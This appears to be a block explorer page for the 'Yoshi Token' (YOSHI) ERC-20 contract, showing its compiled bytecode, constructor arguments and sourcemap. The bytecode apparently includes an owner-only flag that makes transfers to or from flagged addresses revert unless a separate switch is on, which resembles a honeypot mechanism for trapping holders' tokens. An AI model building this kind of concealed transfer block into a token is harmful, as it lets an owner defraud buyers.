f1061068f576101008083540402835291602001916106ba565b820191906000526020600020905b81548152906001019060200180831161069d57829003601f168201915b5050505050905090565b6000806000806106d261096b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561078f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610786906113fd565b60405180910390fd5b6107ac61079a61096b565b8585846107a79190611301565b610973565b600191505092915050565b60006107cb6107c461096b565b8484610b3b565b6001905092915050565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461082f57600080fd5b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109d99061148f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a51576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a4890611521565b60405180910390fd5b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b2e91906110ce565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610baa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba1906115b3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1090611645565b60405180910390fd5b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610cba5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610d165760011515600360149054906101000a900460ff16151514610d15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0c9061168b565b60405180910390fd5b5b610d21838383610eeb565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610da8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9f9061171d565b60405180910390fd5b8181610db49190611301565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610e469190611335565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610eaa91906110ce565b60405180910390a3610ebd848484610ef0565b50505050565b60007f0000000000000000000000000000000000000000000000000000000000000009905090565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610f2f578082015181840152602081019050610f14565b83811115610f3e576000848401525b50505050565b6000601f19601f8301169050919050565b6000610f6082610ef5565b610f6a8185610f00565b9350610f7a818560208601610f11565b610f8381610f44565b840191505092915050565b60006020820190508181036000830152610fa88184610f55565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610fe082610fb5565b9050919050565b610ff081610fd5565b8114610ffb57600080fd5b50565b60008135905061100d81610fe7565b92915050565b6000819050919050565b61102681611013565b811461103157600080fd5b50565b6000813590506110438161101d565b92915050565b600080604083850312156110605761105f610fb0565b5b600061106e85828601610ffe565b925050602061107f85828601611034565b9150509250929050565b60008115159050919050565b61109e81611089565b82525050565b60006020820190506110b96000830184611095565b92915050565b6110c881611013565b82525050565b60006020820190506110e360008301846110bf565b92915050565b6000602082840312156110ff576110fe610fb0565b5b600061110d84828501610ffe565b91505092915050565b60008060006060848603121561112f5761112e610fb0565b5b600061113d86828701610ffe565b935050602061114e86828701610ffe565b925050604061115f86828701611034565b9150509250925092565b600060ff82169050919050565b61117f81611169565b82525050565b600060208201905061119a6000830184611176565b92915050565b600080604083850312156111b7576111b6610fb0565b5b60006111c585828601610ffe565b92505060206111d685828601610ffe565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061122757607f821691505b60208210810361123a576112396111e0565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061129c602883610f00565b91506112a782611240565b604082019050919050565b600060208201905081810360008301526112cb8161128f565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061130c82611013565b915061131783611013565b92508282101561132a576113296112d2565b5b828203905092915050565b600061134082611013565b915061134b83611013565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156113805761137f6112d2565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006113e7602583610f00565b91506113f28261138b565b604082019050919050565b60006020820190508181036000830152611416816113da565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611479602483610f00565b91506114848261141d565b604082019050919050565b600060208201905081810360008301526114a88161146c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061150b602283610f00565b9150611516826114af565b604082019050919050565b6000602082019050818103600083015261153a816114fe565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061159d602583610f00565b91506115a882611541565b604082019050919050565b600060208201905081810360008301526115cc81611590565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061162f602383610f00565b915061163a826115d3565b604082019050919050565b6000602082019050818103600083015261165e81611622565b9050919050565b50565b6000611675600083610f00565b915061168082611665565b600082019050919050565b600060208201905081810360008301526116a481611668565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611707602683610f00565b9150611712826116ab565b604082019050919050565b60006020820190508181036000830152611736816116fa565b905091905056fea26469706673582212203515f555460af317fd5b620e7842f2f1934027a95f7a9f3dcb47a481ff4e8e2864736f6c634300080f0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000000000000000000000005915ac64208fae8a8800000000000000000000000000000000000000000000000000000000000000000b596f73686920546f6b656e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005594f534849000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Yoshi Token
Arg [1] : symbol_ (string): YOSHI
Arg [2] : decimals_ (uint8): 9
Arg [3] : _totalSupply_ (uint256): 420690420690420000000000

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [3] : 000000000000000000000000000000000000000000005915ac64208fae8a8800
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [5] : 596f73686920546f6b656e000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [7] : 594f534849000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

10821:369:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4038:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4501:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3922:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4930:115;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5535:418;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11080:107;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6131:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4366:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4146:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6524:375;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5053:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4678:136;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5236:153;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4822:100;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4038;4092:13;4125:5;4118:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4038:100;:::o;4501:169::-;4584:4;4601:39;4610:12;:10;:12::i;:::-;4624:7;4633:6;4601:8;:39::i;:::-;4658:4;4651:11;;4501:169;;;;:::o;3922:108::-;3983:7;4010:12;;4003:19;;3922:108;:::o;4930:115::-;4988:4;5012:16;:25;5029:7;5012:25;;;;;;;;;;;;;;;;;;;;;;;;;5005:32;;4930:115;;;:::o;5535:418::-;5641:4;5658:36;5668:6;5676:9;5687:6;5658:9;:36::i;:::-;5705:24;5732:11;:19;5744:6;5732:19;;;;;;;;;;;;;;;:33;5752:12;:10;:12::i;:::-;5732:33;;;;;;;;;;;;;;;;5705:60;;5804:6;5784:16;:26;;5776:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;5866:57;5875:6;5883:12;:10;:12::i;:::-;5916:6;5897:16;:25;;;;:::i;:::-;5866:8;:57::i;:::-;5941:4;5934:11;;;5535:418;;;;;:::o;11080:107::-;11138:5;11163:16;:14;:16::i;:::-;11156:23;;11080:107;:::o;6131:215::-;6219:4;6236:80;6245:12;:10;:12::i;:::-;6259:7;6305:10;6268:11;:25;6280:12;:10;:12::i;:::-;6268:25;;;;;;;;;;;;;;;:34;6294:7;6268:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;6236:8;:80::i;:::-;6334:4;6327:11;;6131:215;;;;:::o;4366:127::-;4440:7;4467:9;:18;4477:7;4467:18;;;;;;;;;;;;;;;;4460:25;;4366:127;;;:::o;4146:104::-;4202:13;4235:7;4228:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4146:104;:::o;6524:375::-;6617:4;6634:24;6661:11;:25;6673:12;:10;:12::i;:::-;6661:25;;;;;;;;;;;;;;;:34;6687:7;6661:34;;;;;;;;;;;;;;;;6634:61;;6734:15;6714:16;:35;;6706:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;6802:67;6811:12;:10;:12::i;:::-;6825:7;6853:15;6834:16;:34;;;;:::i;:::-;6802:8;:67::i;:::-;6887:4;6880:11;;;6524:375;;;;:::o;5053:175::-;5139:4;5156:42;5166:12;:10;:12::i;:::-;5180:9;5191:6;5156:9;:42::i;:::-;5216:4;5209:11;;5053:175;;;;:::o;4678:136::-;4753:8;;;;;;;;;;;4739:22;;:10;:22;;;4731:31;;;;;;4802:4;4774:16;:25;4791:7;4774:25;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;4678:136;:::o;5236:153::-;5327:7;5354:11;:18;5366:5;5354:18;;;;;;;;;;;;;;;:27;5373:7;5354:27;;;;;;;;;;;;;;;;5347:34;;5236:153;;;;:::o;4822:100::-;4909:5;4881:16;:25;4898:7;4881:25;;;;;;;;;;;;;;;;:33;;;;;;;;;;;;;;;;;;4822:100;:::o;2862:98::-;2915:7;2942:10;2935:17;;2862:98;:::o;9237:344::-;9356:1;9339:19;;:5;:19;;;9331:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9437:1;9418:21;;:7;:21;;;9410:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9519:6;9489:11;:18;9501:5;9489:18;;;;;;;;;;;;;;;:27;9508:7;9489:27;;;;;;;;;;;;;;;:36;;;;9557:7;9541:32;;9550:5;9541:32;;;9566:6;9541:32;;;;;;:::i;:::-;;;;;;;;9237:344;;;:::o;7031:762::-;7156:1;7138:20;;:6;:20;;;7120:80;;;;;;;;;;;;:::i;:::-;;;;;;;;;7241:1;7220:23;;:9;:23;;;7202:81;;;;;;;;;;;;:::i;:::-;;;;;;;;;7299:16;:27;7316:9;7299:27;;;;;;;;;;;;;;;;;;;;;;;;;:55;;;;7330:16;:24;7347:6;7330:24;;;;;;;;;;;;;;;;;;;;;;;;;7299:55;7295:93;;;7379:4;7364:19;;:11;;;;;;;;;;;:19;;;7356:32;;;;;;;;;;;;:::i;:::-;;;;;;;;;7295:93;7399:47;7420:6;7428:9;7439:6;7399:20;:47::i;:::-;7457:21;7481:9;:17;7491:6;7481:17;;;;;;;;;;;;;;;;7457:41;;7534:6;7517:13;:23;;7509:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;7630:6;7614:13;:22;;;;:::i;:::-;7594:9;:17;7604:6;7594:17;;;;;;;;;;;;;;;:42;;;;7671:6;7647:9;:20;7657:9;7647:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;7710:9;7693:35;;7702:6;7693:35;;;7721:6;7693:35;;;;;;:::i;:::-;;;;;;;;7739:46;7759:6;7767:9;7778:6;7739:19;:46::i;:::-;7118:675;7031:762;;;:::o;10659:100::-;10717:5;10742:9;10735:16;;10659:100;:::o;10147:91::-;;;;:::o;10049:90::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:329::-;3905:6;3954:2;3942:9;3933:7;3929:23;3925:32;3922:119;;;3960:79;;:::i;:::-;3922:119;4080:1;4105:53;4150:7;4141:6;4130:9;4126:22;4105:53;:::i;:::-;4095:63;;4051:117;3846:329;;;;:::o;4181:619::-;4258:6;4266;4274;4323:2;4311:9;4302:7;4298:23;4294:32;4291:119;;;4329:79;;:::i;:::-;4291:119;4449:1;4474:53;4519:7;4510:6;4499:9;4495:22;4474:53;:::i;:::-;4464:63;;4420:117;4576:2;4602:53;4647:7;4638:6;4627:9;4623:22;4602:53;:::i;:::-;4592:63;;4547:118;4704:2;4730:53;4775:7;4766:6;4755:9;4751:22;4730:53;:::i;:::-;4720:63;;4675:118;4181:619;;;;;:::o;4806:86::-;4841:7;4881:4;4874:5;4870:16;4859:27;;4806:86;;;:::o;4898:112::-;4981:22;4997:5;4981:22;:::i;:::-;4976:3;4969:35;4898:112;;:::o;5016:214::-;5105:4;5143:2;5132:9;5128:18;5120:26;;5156:67;5220:1;5209:9;5205:17;5196:6;5156:67;:::i;:::-;5016:214;;;;:::o;5236:474::-;5304:6;5312;5361:2;5349:9;5340:7;5336:23;5332:32;5329:119;;;5367:79;;:::i;:::-;5329:119;5487:1;5512:53;5557:7;5548:6;5537:9;5533:22;5512:53;:::i;:::-;5502:63;;5458:117;5614:2;5640:53;5685:7;5676:6;5665:9;5661:22;5640:53;:::i;:::-;5630:63;;5585:118;5236:474;;;;;:::o;5716:180::-;5764:77;5761:1;5754:88;5861:4;5858:1;5851:15;5885:4;5882:1;5875:15;5902:320;5946:6;5983:1;5977:4;5973:12;5963:22;;6030:1;6024:4;6020:12;6051:18;6041:81;;6107:4;6099:6;6095:17;6085:27;;6041:81;6169:2;6161:6;6158:14;6138:18;6135:38;6132:84;;6188:18;;:::i;:::-;6132:84;5953:269;5902:320;;;:::o;6228:227::-;6368:34;6364:1;6356:6;6352:14;6345:58;6437:10;6432:2;6424:6;6420:15;6413:35;6228:227;:::o;6461:366::-;6603:3;6624:67;6688:2;6683:3;6624:67;:::i;:::-;6617:74;;6700:93;6789:3;6700:93;:::i;:::-;6818:2;6813:3;6809:12;6802:19;;6461:366;;;:::o;6833:419::-;6999:4;7037:2;7026:9;7022:18;7014:26;;7086:9;7080:4;7076:20;7072:1;7061:9;7057:17;7050:47;7114:131;7240:4;7114:131;:::i;:::-;7106:139;;6833:419;;;:::o;7258:180::-;7306:77;7303:1;7296:88;7403:4;7400:1;7393:15;7427:4;7424:1;7417:15;7444:191;7484:4;7504:20;7522:1;7504:20;:::i;:::-;7499:25;;7538:20;7556:1;7538:20;:::i;:::-;7533:25;;7577:1;7574;7571:8;7568:34;;;7582:18;;:::i;:::-;7568:34;7627:1;7624;7620:9;7612:17;;7444:191;;;;:::o;7641:305::-;7681:3;7700:20;7718:1;7700:20;:::i;:::-;7695:25;;7734:20;7752:1;7734:20;:::i;:::-;7729:25;;7888:1;7820:66;7816:74;7813:1;7810:81;7807:107;;;7894:18;;:::i;:::-;7807:107;7938:1;7935;7931:9;7924:16;;7641:305;;;;:::o;7952:224::-;8092:34;8088:1;8080:6;8076:14;8069:58;8161:7;8156:2;8148:6;8144:15;8137:32;7952:224;:::o;8182:366::-;8324:3;8345:67;8409:2;8404:3;8345:67;:::i;:::-;8338:74;;8421:93;8510:3;8421:93;:::i;:::-;8539:2;8534:3;8530:12;8523:19;;8182:366;;;:::o;8554:419::-;8720:4;8758:2;8747:9;8743:18;8735:26;;8807:9;8801:4;8797:20;8793:1;8782:9;8778:17;8771:47;8835:131;8961:4;8835:131;:::i;:::-;8827:139;;8554:419;;;:::o;8979:223::-;9119:34;9115:1;9107:6;9103:14;9096:58;9188:6;9183:2;9175:6;9171:15;9164:31;8979:223;:::o;9208:366::-;9350:3;9371:67;9435:2;9430:3;9371:67;:::i;:::-;9364:74;;9447:93;9536:3;9447:93;:::i;:::-;9565:2;9560:3;9556:12;9549:19;;9208:366;;;:::o;9580:419::-;9746:4;9784:2;9773:9;9769:18;9761:26;;9833:9;9827:4;9823:20;9819:1;9808:9;9804:17;9797:47;9861:131;9987:4;9861:131;:::i;:::-;9853:139;;9580:419;;;:::o;10005:221::-;10145:34;10141:1;10133:6;10129:14;10122:58;10214:4;10209:2;10201:6;10197:15;10190:29;10005:221;:::o;10232:366::-;10374:3;10395:67;10459:2;10454:3;10395:67;:::i;:::-;10388:74;;10471:93;10560:3;10471:93;:::i;:::-;10589:2;10584:3;10580:12;10573:19;;10232:366;;;:::o;10604:419::-;10770:4;10808:2;10797:9;10793:18;10785:26;;10857:9;10851:4;10847:20;10843:1;10832:9;10828:17;10821:47;10885:131;11011:4;10885:131;:::i;:::-;10877:139;;10604:419;;;:::o;11029:224::-;11169:34;11165:1;11157:6;11153:14;11146:58;11238:7;11233:2;11225:6;11221:15;11214:32;11029:224;:::o;11259:366::-;11401:3;11422:67;11486:2;11481:3;11422:67;:::i;:::-;11415:74;;11498:93;11587:3;11498:93;:::i;:::-;11616:2;11611:3;11607:12;11600:19;;11259:366;;;:::o;11631:419::-;11797:4;11835:2;11824:9;11820:18;11812:26;;11884:9;11878:4;11874:20;11870:1;11859:9;11855:17;11848:47;11912:131;12038:4;11912:131;:::i;:::-;11904:139;;11631:419;;;:::o;12056:222::-;12196:34;12192:1;12184:6;12180:14;12173:58;12265:5;12260:2;12252:6;12248:15;12241:30;12056:222;:::o;12284:366::-;12426:3;12447:67;12511:2;12506:3;12447:67;:::i;:::-;12440:74;;12523:93;12612:3;12523:93;:::i;:::-;12641:2;12636:3;12632:12;12625:19;;12284:366;;;:::o;12656:419::-;12822:4;12860:2;12849:9;12845:18;12837:26;;12909:9;12903:4;12899:20;12895:1;12884:9;12880:17;12873:47;12937:131;13063:4;12937:131;:::i;:::-;12929:139;;12656:419;;;:::o;13081:114::-;;:::o;13201:364::-;13343:3;13364:66;13428:1;13423:3;13364:66;:::i;:::-;13357:73;;13439:93;13528:3;13439:93;:::i;:::-;13557:1;13552:3;13548:11;13541:18;;13201:364;;;:::o;13571:419::-;13737:4;13775:2;13764:9;13760:18;13752:26;;13824:9;13818:4;13814:20;13810:1;13799:9;13795:17;13788:47;13852:131;13978:4;13852:131;:::i;:::-;13844:139;;13571:419;;;:::o;13996:225::-;14136:34;14132:1;14124:6;14120:14;14113:58;14205:8;14200:2;14192:6;14188:15;14181:33;13996:225;:::o;14227:366::-;14369:3;14390:67;14454:2;14449:3;14390:67;:::i;:::-;14383:74;;14466:93;14555:3;14466:93;:::i;:::-;14584:2;14579:3;14575:12;14568:19;;14227:366;;;:::o;14599:419::-;14765:4;14803:2;14792:9;14788:18;14780:26;;14852:9;14846:4;14842:20;14838:1;14827:9;14823:17;14816:47;14880:131;15006:4;14880:131;:::i;:::-;14872:139;;14599:419;;;:::o

Swarm Source

ipfs://3515f555460af317fd5b620e7842f2f1934027a95f7a9f3dcb47a481ff4e8e28
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.